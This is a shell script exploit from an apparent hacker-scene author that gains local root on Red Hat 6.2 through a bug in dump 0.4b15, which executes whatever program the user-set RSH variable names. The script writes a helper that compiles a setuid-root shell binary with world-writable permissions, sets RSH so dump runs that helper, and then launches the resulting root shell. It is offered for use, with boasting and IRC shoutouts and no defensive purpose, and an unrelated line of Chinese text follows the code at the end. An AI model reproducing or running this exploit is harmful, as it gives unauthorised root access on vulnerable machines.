#!/bin/sh # # Exploits a stupid bug in redhat 6.2's (others..) dump program. # dump version 0.4b15 executes program which is found in # a user modifiable environment variable (RSH). # # Have fun! # - fish # # Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs, # ralph, jen, madspin, hampton, ego, als, scorch. # # Cause we da pimpz of #code! (not ef/dal.. etc) # (irc > irl ? werd : lame) # # WERD to the async, isolated, expedience, mindsong, and analog crews # # # #TelcoNinjas can eat it cause they suck hardc0re # #TelcoNinjas == #smurfkiddies # cat > execute_me << EOF #!/bin/sh echo "#include " > cool.c echo "int main() { " >> cool.c echo " setuid(0);" >> cool.c echo " execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c echo " return 0;" >> cool.c echo "}" >> cool.c gcc -o cool cool.c chown root: cool chmod 4777 cool EOF chmod +x execute_me # now executing the dump command export TAPE=garbage:garbage export RSH=./execute_me /sbin/dump -0 / echo "Root shell should now be in ./cool" echo "Have fun!" # Exec'n the r00t sh3ll! # werd this is so stupid that programs are written this poorly... # You'd think the guys at Redhat had some sense.. ./cool

亚洲欧美在线